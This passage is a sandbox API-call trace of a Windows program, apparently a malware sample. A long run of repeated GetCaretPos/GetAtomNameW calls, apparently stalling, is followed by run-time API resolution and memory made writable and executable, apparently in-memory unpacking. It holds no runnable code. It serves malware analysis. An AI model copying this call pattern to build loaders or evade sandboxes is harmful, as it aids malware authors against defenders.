lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.496] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.496] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.497] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.497] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.498] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.498] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.499] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.499] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.500] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.500] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.501] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.501] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.502] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.502] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.503] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.503] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.504] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.504] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.504] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.504] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.504] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.504] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.504] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.504] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0053.079] lstrcpyW (in: lpString1=0x5519c0, lpString2="VirtualProtect" | out: lpString1="VirtualProtect") returned="VirtualProtect" [0053.079] LocalAlloc (uFlags=0x0, uBytes=0x90de0) returned 0x1d70020 [0053.088] VirtualProtect (in: lpAddress=0x1d70020, dwSize=0x90de0, flNewProtect=0x40, lpflOldProtect=0x18e930 | out: lpflOldProtect=0x18e930*=0x4) returned 1 [0053.180] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0053.181] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0053.181] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0053.181] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0053.181] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0053.181] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0053.181] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0053.181] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0053.181] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0053.184] Module32First (hSnapshot=0x58, lpme=0x18eac4) returned 1 [0053.185] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1e10000 [0053.233] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0053.233] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0053.233] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0053.233] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0053.233] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0053.234] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0053.234] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0053.234] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0053.234] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0053.234] SetErrorMode (uMode=0x400) returned 0x0 [0053.234] SetErrorMode (uMode=0x0) returned 0x400 [0053.234] GetVersionExA (in: lpVersionInformation=0x18d9f4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18d9f4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0053.234] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f30000 [0053.255] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ea7c | out: lpflOldProtect=0x18ea7c*=0x2) returned 1 [0053.542] VirtualFree (lpAddress=0x1f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0053.547] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0053.547] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0053.548] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0053.548] GetProcAddress (hModule=0x76af0000, 